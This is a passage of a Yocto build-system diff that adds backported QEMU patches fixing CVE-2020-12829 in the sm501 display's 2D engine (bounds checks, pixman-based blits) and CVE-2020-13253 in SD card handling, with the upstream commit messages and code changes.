++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented system config"
++ "register read. addr=%" HWADDR_PRIx "\n", addr);
+ }
+
+ return ret;
+@@ -948,15 +947,15 @@ static void sm501_system_config_write(void *opaque, hwaddr addr,
+ break;
+ case SM501_ENDIAN_CONTROL:
+ if (value & 0x00000001) {
+- printf("sm501 system config : big endian mode not implemented.\n");
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: system config big endian mode not"
++ " implemented.\n");
+ }
+ break;
+
+ default:
+- printf("sm501 system config : not implemented register write."
+- " addr=%x, val=%x\n", (int)addr, (uint32_t)value);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented system config"
++ "register write. addr=%" HWADDR_PRIx
++ ", val=%" PRIx64 "\n", addr, value);
+ }
+ }
+
+@@ -1207,9 +1206,8 @@ static uint64_t sm501_disp_ctrl_read(void *opaque, hwaddr addr,
+ break;
+
+ default:
+- printf("sm501 disp ctrl : not implemented register read."
+- " addr=%x\n", (int)addr);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register "
++ "read. addr=%" HWADDR_PRIx "\n", addr);
+ }
+
+ return ret;
+@@ -1345,9 +1343,9 @@ static void sm501_disp_ctrl_write(void *opaque, hwaddr addr,
+ break;
+
+ default:
+- printf("sm501 disp ctrl : not implemented register write."
+- " addr=%x, val=%x\n", (int)addr, (unsigned)value);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register "
++ "write. addr=%" HWADDR_PRIx
++ ", val=%" PRIx64 "\n", addr, value);
+ }
+ }
+
+@@ -1433,9 +1431,8 @@ static uint64_t sm501_2d_engine_read(void *opaque, hwaddr addr,
+ ret = 0; /* Should return interrupt status */
+ break;
+ default:
+- printf("sm501 disp ctrl : not implemented register read."
+- " addr=%x\n", (int)addr);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register "
++ "read. addr=%" HWADDR_PRIx "\n", addr);
+ }
+
+ return ret;
+@@ -1520,9 +1517,9 @@ static void sm501_2d_engine_write(void *opaque, hwaddr addr,
+ /* ignored, writing 0 should clear interrupt status */
+ break;
+ default:
+- printf("sm501 2d engine : not implemented register write."
+- " addr=%x, val=%x\n", (int)addr, (unsigned)value);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2d engine register "
++ "write. addr=%" HWADDR_PRIx
++ ", val=%" PRIx64 "\n", addr, value);
+ }
+ }
+
+@@ -1670,9 +1667,9 @@ static void sm501_update_display(void *opaque)
+ draw_line = draw_line32_funcs[dst_depth_index];
+ break;
+ default:
+- printf("sm501 update display : invalid control register value.\n");
+- abort();
+- break;
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: update display"
++ "invalid control register value.\n");
++ return;
+ }
+
+ /* set up to draw hardware cursor */
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch
new file mode 100644
index 0000000000..e7258a43d3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch
@@ -0,0 +1,139 @@
+From 6f8183b5dc5b309378687830a25e85ea8fb860ea Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 2/5] sm501: Shorten long variable names in sm501_2d_operation
+
+This increases readability and cleans up some confusing naming.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Message-id: b9b67b94c46e945252a73c77dfd117132c63c4fb.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 45 ++++++++++++++++++++++-----------------------
+ 1 file changed, 22 insertions(+), 23 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index bd3ccfe311..f42d05e1e4 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -700,17 +700,16 @@ static inline void hwc_invalidate(SM501State *s, int crt)
+ static void sm501_2d_operation(SM501State *s)
+ {
+ /* obtain operation parameters */
+- int operation = (s->twoD_control >> 16) & 0x1f;
++ int cmd = (s->twoD_control >> 16) & 0x1F;
+ int rtl = s->twoD_control & 0x8000000;
+ int src_x = (s->twoD_source >> 16) & 0x01FFF;
+ int src_y = s->twoD_source & 0xFFFF;
+ int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+ int dst_y = s->twoD_destination & 0xFFFF;
+- int operation_width = (s->twoD_dimension >> 16) & 0x1FFF;
+- int operation_height = s->twoD_dimension & 0xFFFF;
++ int width = (s->twoD_dimension >> 16) & 0x1FFF;
++ int height = s->twoD_dimension & 0xFFFF;
+ uint32_t color = s->twoD_foreground;
+- int format_flags = (s->twoD_stretch >> 20) & 0x3;
+- int addressing = (s->twoD_stretch >> 16) & 0xF;
++ int format = (s->twoD_stretch >> 20) & 0x3;
+ int rop_mode = (s->twoD_control >> 15) & 0x1; /* 1 for rop2, else rop3 */
+ /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */
+ int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1;
+@@ -721,12 +720,12 @@ static void sm501_2d_operation(SM501State *s)
+ /* get frame buffer info */
+ uint8_t *src = s->local_mem + src_base;
+ uint8_t *dst = s->local_mem + dst_base;
+- int src_width = s->twoD_pitch & 0x1FFF;
+- int dst_width = (s->twoD_pitch >> 16) & 0x1FFF;
++ int src_pitch = s->twoD_pitch & 0x1FFF;
++ int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
+ int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0;
+ int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+
+- if (addressing != 0x0) {
++ if ((s->twoD_stretch >> 16) & 0xF) {
+ qemu_log_mask(LOG_UNIMP, "sm501: only XY addressing is supported.\n");
+ return;
+ }
+@@ -758,20 +757,20 @@ static void sm501_2d_operation(SM501State *s)
+ return;
+ }
+
+- switch (operation) {
++ switch (cmd) {
+ case 0x00: /* copy area */
+ #define COPY_AREA(_bpp, _pixel_type, rtl) { \
+ int y, x, index_d, index_s; \
+- for (y = 0; y < operation_height; y++) { \
+- for (x = 0; x < operation_width; x++) { \
++ for (y = 0; y < height; y++) { \
++ for (x = 0; x < width; x++) { \
+ _pixel_type val; \
+ \
+ if (rtl) { \
+- index_s = ((src_y - y) * src_width + src_x - x) * _bpp; \
+- index_d = ((dst_y - y) * dst_width + dst_x - x) * _bpp; \
++ index_s = ((src_y - y) * src_pitch + src_x - x) * _bpp; \
++ index_d = ((dst_y - y) * dst_pitch + dst_x - x) * _bpp; \
+ } else { \
+- index_s = ((src_y + y) * src_width + src_x + x) * _bpp; \
+- index_d = ((dst_y + y) * dst_width + dst_x + x) * _bpp; \
++ index_s = ((src_y + y) * src_pitch + src_x + x) * _bpp; \
++ index_d = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
+ } \
+ if (rop_mode == 1 && rop == 5) { \
+ /* Invert dest */ \
+@@ -783,7 +782,7 @@ static void sm501_2d_operation(SM501State *s)
+ } \
+ } \
+ }
+- switch (format_flags) {
++ switch (format) {
+ case 0:
+ COPY_AREA(1, uint8_t, rtl);
+ break;
+@@ -799,15 +798,15 @@ static void sm501_2d_operation(SM501State *s)
+ case 0x01: /* fill rectangle */
+ #define FILL_RECT(_bpp, _pixel_type) { \
+ int y, x; \
+- for (y = 0; y < operation_height; y++) { \
+- for (x = 0; x < operation_width; x++) { \
+- int index = ((dst_y + y) * dst_width + dst_x + x) * _bpp; \
++ for (y = 0; y < height; y++) { \
++ for (x = 0; x < width; x++) { \
++ int index = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
+ *(_pixel_type *)&dst[index] = (_pixel_type)color; \
+ } \
+ } \
+ }
+
+- switch (format_flags) {
++ switch (format) {
+ case 0:
+ FILL_RECT(1, uint8_t);
+ break;
+@@ -824,14 +823,14 @@ static void sm501_2d_operation(SM501State *s)
+
+ default:
+ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n",
+- operation);
++ cmd);
+ return;
+ }
+
+ if (dst_base >= get_fb_addr(s, crt) &&
+ dst_base <= get_fb_addr(s, crt) + fb_len) {
+- int dst_len = MIN(fb_len, ((dst_y + operation_height - 1) * dst_width +
+- dst_x + operation_width) * (1 << format_flags));
++ int dst_len = MIN(fb_len, ((dst_y + height - 1) * dst_pitch +
++ dst_x + width) * (1 << format));
+ if (dst_len) {
+ memory_region_set_dirty(&s->local_mem_region, dst_base, dst_len);
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch
new file mode 100644
index 0000000000..c647028cfe
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch
@@ -0,0 +1,47 @@
+From 2824809b7f8f03ddc6e2b7e33e78c06022424298 Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 3/5] sm501: Use BIT(x) macro to shorten constant
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-id: 124bf5de8d7cf503b32b377d0445029a76bfbd49.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#3
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index f42d05e1e4..97660090bb 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -701,7 +701,7 @@ static void sm501_2d_operation(SM501State *s)
+ {
+ /* obtain operation parameters */
+ int cmd = (s->twoD_control >> 16) & 0x1F;
+- int rtl = s->twoD_control & 0x8000000;
++ int rtl = s->twoD_control & BIT(27);
+ int src_x = (s->twoD_source >> 16) & 0x01FFF;
+ int src_y = s->twoD_source & 0xFFFF;
+ int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+@@ -751,8 +751,7 @@ static void sm501_2d_operation(SM501State *s)
+ }
+ }
+
+- if ((s->twoD_source_base & 0x08000000) ||
+- (s->twoD_destination_base & 0x08000000)) {
++ if (s->twoD_source_base & BIT(27) || s->twoD_destination_base & BIT(27)) {
+ qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n");
+ return;
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch
new file mode 100644
index 0000000000..485af05e1e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch
@@ -0,0 +1,100 @@
+From 3d0b096298b5579a7fa0753ad90968b27bc65372 Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 4/5] sm501: Clean up local variables in sm501_2d_operation
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Make variables local to the block they are used in to make it clearer
+which operation they are needed for.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-id: ae59f8138afe7f6a5a4a82539d0f61496a906b06.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#4
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 31 ++++++++++++++++---------------
+ 1 file changed, 16 insertions(+), 15 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index 97660090bb..5ed57703d8 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -699,28 +699,19 @@ static inline void hwc_invalidate(SM501State *s, int crt)
+
+ static void sm501_2d_operation(SM501State *s)
+ {
+- /* obtain operation parameters */
+ int cmd = (s->twoD_control >> 16) & 0x1F;
+ int rtl = s->twoD_control & BIT(27);
+- int src_x = (s->twoD_source >> 16) & 0x01FFF;
+- int src_y = s->twoD_source & 0xFFFF;
+- int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+- int dst_y = s->twoD_destination & 0xFFFF;
+- int width = (s->twoD_dimension >> 16) & 0x1FFF;
+- int height = s->twoD_dimension & 0xFFFF;
+- uint32_t color = s->twoD_foreground;
+ int format = (s->twoD_stretch >> 20) & 0x3;
+ int rop_mode = (s->twoD_control >> 15) & 0x1; /* 1 for rop2, else rop3 */
+ /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */
+ int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1;
+ int rop = s->twoD_control & 0xFF;
+- uint32_t src_base = s->twoD_source_base & 0x03FFFFFF;
++ int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
++ int dst_y = s->twoD_destination & 0xFFFF;
++ int width = (s->twoD_dimension >> 16) & 0x1FFF;
++ int height = s->twoD_dimension & 0xFFFF;
+ uint32_t dst_base = s->twoD_destination_base & 0x03FFFFFF;
+-
+- /* get frame buffer info */
+- uint8_t *src = s->local_mem + src_base;
+ uint8_t *dst = s->local_mem + dst_base;
+- int src_pitch = s->twoD_pitch & 0x1FFF;
+ int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
+ int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0;
+ int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+@@ -758,6 +749,13 @@ static void sm501_2d_operation(SM501State *s)
+
+ switch (cmd) {
+ case 0x00: /* copy area */
++ {
++ int src_x = (s->twoD_source >> 16) & 0x01FFF;
++ int src_y = s->twoD_source & 0xFFFF;
++ uint32_t src_base = s->twoD_source_base & 0x03FFFFFF;
++ uint8_t *src = s->local_mem + src_base;
++ int src_pitch = s->twoD_pitch & 0x1FFF;
++
+ #define COPY_AREA(_bpp, _pixel_type, rtl) { \
+ int y, x, index_d, index_s; \
+ for (y = 0; y < height; y++) { \
+@@ -793,8 +791,11 @@ static void sm501_2d_operation(SM501State *s)
+ break;
+ }
+ break;
+-
++ }
+ case 0x01: /* fill rectangle */
++ {
++ uint32_t color = s->twoD_foreground;
++
+ #define FILL_RECT(_bpp, _pixel_type) { \
+ int y, x; \
+ for (y = 0; y < height; y++) { \
+@@ -819,7 +820,7 @@ static void sm501_2d_operation(SM501State *s)
+ break;
+ }
+ break;
+-
++ }
+ default:
+ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n",
+ cmd);
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch
new file mode 100644
index 0000000000..ab09e8b039
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch
@@ -0,0 +1,266 @@
+From b15a22bbcbe6a78dc3d88fe3134985e4cdd87de4 Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 5/5] sm501: Replace hand written implementation with pixman
+ where possible
+
+Besides being faster this should also prevent malicious guests to
+abuse 2D engine to overwrite data or cause a crash.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Message-id: 58666389b6cae256e4e972a32c05cf8aa51bffc0.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 207 ++++++++++++++++++++++++++-------------------
+ 1 file changed, 119 insertions(+), 88 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index 5ed57703d8..8bf4d111f4 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -706,13 +706,12 @@ static void sm501_2d_operation(SM501State *s)
+ /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */
+ int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1;
+ int rop = s->twoD_control & 0xFF;
+- int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+- int dst_y = s->twoD_destination & 0xFFFF;
+- int width = (s->twoD_dimension >> 16) & 0x1FFF;
+- int height = s->twoD_dimension & 0xFFFF;
++ unsigned int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
++ unsigned int dst_y = s->twoD_destination & 0xFFFF;
++ unsigned int width = (s->twoD_dimension >> 16) & 0x1FFF;
++ unsigned int height = s->twoD_dimension & 0xFFFF;
+ uint32_t dst_base = s->twoD_destination_base & 0x03FFFFFF;
+- uint8_t *dst = s->local_mem + dst_base;
+- int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
++ unsigned int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
+ int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0;
+ int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+
+@@ -721,104 +720,136 @@ static void sm501_2d_operation(SM501State *s)
+ return;
+ }
+
+- if (rop_mode == 0) {
+- if (rop != 0xcc) {
+- /* Anything other than plain copies are not supported */
+- qemu_log_mask(LOG_UNIMP, "sm501: rop3 mode with rop %x is not "
+- "supported.\n", rop);
+- }
+- } else {
+- if (rop2_source_is_pattern && rop != 0x5) {
+- /* For pattern source, we support only inverse dest */
+- qemu_log_mask(LOG_UNIMP, "sm501: rop2 source being the pattern and "
+- "rop %x is not supported.\n", rop);
+- } else {
+- if (rop != 0x5 && rop != 0xc) {
+- /* Anything other than plain copies or inverse dest is not
+- * supported */
+- qemu_log_mask(LOG_UNIMP, "sm501: rop mode %x is not "
+- "supported.\n", rop);
+- }
+- }
+- }
+-
+ if (s->twoD_source_base & BIT(27) || s->twoD_destination_base & BIT(27)) {
+ qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n");
+ return;
+ }
+
++ if (!dst_pitch) {
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero dest pitch.\n");
++ return;
++ }
++
++ if (!width || !height) {
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero size 2D op.\n");
++ return;
++ }
++
++ if (rtl) {
++ dst_x -= width - 1;
++ dst_y -= height - 1;
++ }
++
++ if (dst_base >= get_local_mem_size(s) || dst_base +
++ (dst_x + width + (dst_y + height) * (dst_pitch + width)) *
++ (1 << format) >= get_local_mem_size(s)) {
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: 2D op dest is outside vram.\n");
++ return;
++ }
++
+ switch (cmd) {
+- case 0x00: /* copy area */
++ case 0: /* BitBlt */
+ {
+- int src_x = (s->twoD_source >> 16) & 0x01FFF;
+- int src_y = s->twoD_source & 0xFFFF;
++ unsigned int src_x = (s->twoD_source >> 16) & 0x01FFF;
++ unsigned int src_y = s->twoD_source & 0xFFFF;
+ uint32_t src_base = s->twoD_source_base & 0x03FFFFFF;
+- uint8_t *src = s->local_mem + src_base;
+- int src_pitch = s->twoD_pitch & 0x1FFF;
+-
+-#define COPY_AREA(_bpp, _pixel_type, rtl) { \
+- int y, x, index_d, index_s; \
+- for (y = 0; y < height; y++) { \
+- for (x = 0; x < width; x++) { \
+- _pixel_type val; \
+- \
+- if (rtl) { \
+- index_s = ((src_y - y) * src_pitch + src_x - x) * _bpp; \
+- index_d = ((dst_y - y) * dst_pitch + dst_x - x) * _bpp; \
+- } else { \
+- index_s = ((src_y + y) * src_pitch + src_x + x) * _bpp; \
+- index_d = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
+- } \
+- if (rop_mode == 1 && rop == 5) { \
+- /* Invert dest */ \
+- val = ~*(_pixel_type *)&dst[index_d]; \
+- } else { \
+- val = *(_pixel_type *)&src[index_s]; \
+- } \
+- *(_pixel_type *)&dst[index_d] = val; \
+- } \
+- } \
+- }
+- switch (format) {
+- case 0:
+- COPY_AREA(1, uint8_t, rtl);
+- break;
+- case 1:
+- COPY_AREA(2, uint16_t, rtl);
+- break;
+- case 2:
+- COPY_AREA(4, uint32_t, rtl);
+- break;
++ unsigned int src_pitch = s->twoD_pitch & 0x1FFF;
++
++ if (!src_pitch) {
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero src pitch.\n");
++ return;
++ }
++
++ if (rtl) {
++ src_x -= width - 1;
++ src_y -= height - 1;
++ }
++
++ if (src_base >= get_local_mem_size(s) || src_base +
++ (src_x + width + (src_y + height) * (src_pitch + width)) *
++ (1 << format) >= get_local_mem_size(s)) {
++ qemu_log_mask(LOG_GUEST_ERROR,
++ "sm501: 2D op src is outside vram.\n");
++ return;
++ }
++
++ if ((rop_mode && rop == 0x5) || (!rop_mode && rop == 0x55)) {
++ /* Invert dest, is there a way to do this with pixman? */
++ unsigned int x, y, i;
++ uint8_t *d = s->local_mem + dst_base;
++
++ for (y = 0; y < height; y++) {
++ i = (dst_x + (dst_y + y) * dst_pitch) * (1 << format);
++ for (x = 0; x < width; x++, i += (1 << format)) {
++ switch (format) {
++ case 0:
++ d[i] = ~d[i];
++ break;
++ case 1:
++ *(uint16_t *)&d[i] = ~*(uint16_t *)&d[i];
++ break;
++ case 2:
++ *(uint32_t *)&d[i] = ~*(uint32_t *)&d[i];
++ break;
++ }
++ }
++ }
++ } else {
++ /* Do copy src for unimplemented ops, better than unpainted area */
++ if ((rop_mode && (rop != 0xc || rop2_source_is_pattern)) ||
++ (!rop_mode && rop != 0xcc)) {
++ qemu_log_mask(LOG_UNIMP,
++ "sm501: rop%d op %x%s not implemented\n",
++ (rop_mode ? 2 : 3), rop,
++ (rop2_source_is_pattern ?
++ " with pattern source" : ""));
++ }
++ /* Check for overlaps, this could be made more exact */
++ uint32_t sb, se, db, de;
++ sb = src_base + src_x + src_y * (width + src_pitch);
++ se = sb + width + height * (width + src_pitch);
++ db = dst_base + dst_x + dst_y * (width + dst_pitch);
++ de = db + width + height * (width + dst_pitch);
++ if (rtl && ((db >= sb && db <= se) || (de >= sb && de <= se))) {
++ /* regions may overlap: copy via temporary */
++ int llb = width * (1 << format);
++ int tmp_stride = DIV_ROUND_UP(llb, sizeof(uint32_t));
++ uint32_t *tmp = g_malloc(tmp_stride * sizeof(uint32_t) *
++ height);
++ pixman_blt((uint32_t *)&s->local_mem[src_base], tmp,
++ src_pitch * (1 << format) / sizeof(uint32_t),
++ tmp_stride, 8 * (1 << format), 8 * (1 << format),
++ src_x, src_y, 0, 0, width, height);
++ pixman_blt(tmp, (uint32_t *)&s->local_mem[dst_base],
++ tmp_stride,
++ dst_pitch * (1 << format) / sizeof(uint32_t),
++ 8 * (1 << format), 8 * (1 << format),
++ 0, 0, dst_x, dst_y, width, height);
++ g_free(tmp);
++ } else {
++ pixman_blt((uint32_t *)&s->local_mem[src_base],
++ (uint32_t *)&s->local_mem[dst_base],
++ src_pitch * (1 << format) / sizeof(uint32_t),
++ dst_pitch * (1 << format) / sizeof(uint32_t),
++ 8 * (1 << format), 8 * (1 << format),
++ src_x, src_y, dst_x, dst_y, width, height);
++ }
+ }
+ break;
+ }
+- case 0x01: /* fill rectangle */
++ case 1: /* Rectangle Fill */
+ {
+ uint32_t color = s->twoD_foreground;
+
+-#define FILL_RECT(_bpp, _pixel_type) { \
+- int y, x; \
+- for (y = 0; y < height; y++) { \
+- for (x = 0; x < width; x++) { \
+- int index = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
+- *(_pixel_type *)&dst[index] = (_pixel_type)color; \
+- } \
+- } \
+- }
+-
+- switch (format) {
+- case 0:
+- FILL_RECT(1, uint8_t);
+- break;
+- case 1:
+- color = cpu_to_le16(color);
+- FILL_RECT(2, uint16_t);
+- break;
+- case 2:
++ if (format == 2) {
+ color = cpu_to_le32(color);
+- FILL_RECT(4, uint32_t);
+- break;
++ } else if (format == 1) {
++ color = cpu_to_le16(color);
+ }
++
++ pixman_fill((uint32_t *)&s->local_mem[dst_base],
++ dst_pitch * (1 << format) / sizeof(uint32_t),
++ 8 * (1 << format), dst_x, dst_y, width, height, color);
+ break;
+ }
+ default:
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch
new file mode 100644
index 0000000000..7f8383987c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch
@@ -0,0 +1,50 @@
+From 6dd3a164f5b31c703c7d8372841ad3bd6a57de6d Mon Sep 17 00:00:00 2001
+From: =?utf8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Tue, 5 Jun 2018 22:28:51 -0300
+Subject: [PATCH 1/1] hw/sd/sdcard: Simplify realize() a bit
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+We don't need to check if sd->blk is set twice.
+
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Message-Id: <20200630133912.9428-18-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;f=hw/sd/sd.c;h=6dd3a164f5b31c703c7d8372841ad3bd6a57de6d
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 10 +++++-----
+ 1 file changed, 5 insertions(+), 5 deletions(-)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index 1cc16bf..edd60a0 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -2105,12 +2105,12 @@ static void sd_realize(DeviceState *dev, Error **errp)
+ return;
+ }
+
+- if (sd->blk && blk_is_read_only(sd->blk)) {
+- error_setg(errp, "Cannot use read-only drive as SD card");
+- return;
+- }
+-
+ if (sd->blk) {
++ if (blk_is_read_only(sd->blk)) {
++ error_setg(errp, "Cannot use read-only drive as SD card");
++ return;
++ }
++
+ ret = blk_set_perm(sd->blk, BLK_PERM_CONSISTENT_READ | BLK_PERM_WRITE,
+ BLK_PERM_ALL, errp);
+ if (ret < 0) {
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch
new file mode 100644
index 0000000000..53145d059f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch
@@ -0,0 +1,112 @@
+From a9bcedd15a5834ca9ae6c3a97933e85ac7edbd36 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Tue, 7 Jul 2020 13:02:34 +0200
+Subject: [PATCH] hw/sd/sdcard: Do not allow invalid SD card sizes
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+QEMU allows to create SD card with unrealistic sizes. This could
+work, but some guests (at least Linux) consider sizes that are not
+a power of 2 as a firmware bug and fix the card size to the next
+power of 2.
+
+While the possibility to use small SD card images has been seen as
+a feature, it became a bug with CVE-2020-13253, where the guest is
+able to do OOB read/write accesses past the image size end.
+
+In a pair of commits we will fix CVE-2020-13253 as:
+
+ Read command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+ occurred and no data transfer is performed.
+
+ Write command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+ occurred and no data transfer is performed.
+
+ WP_VIOLATION errors are not modified: the error bit is set, we
+ stay in receive-data state, wait for a stop command. All further
+ data transfer is ignored. See the check on sd->card_status at the
+ beginning of sd_read_data() and sd_write_data().
+
+While this is the correct behavior, in case QEMU create smaller SD
+cards, guests still try to access past the image size end, and QEMU
+considers this is an invalid address, thus "all further data transfer
+is ignored". This is wrong and make the guest looping until
+eventually timeouts.
+
+Fix by not allowing invalid SD card sizes (suggesting the expected
+size as a hint):
+
+ $ qemu-system-arm -M orangepi-pc -drive file=rootfs.ext2,if=sd,format=raw
+ qemu-system-arm: Invalid SD card size: 60 MiB
+ SD card size has to be a power of 2, e.g. 64 MiB.
+ You can resize disk images with 'qemu-img resize <imagefile> <new-size>'
+ (note that this will lose data if you make the image smaller than it currently is).
+
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Message-Id: <20200713183209.26308-8-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;h=a9bcedd15a5834ca9ae6c3a97933e85ac7edbd36
+
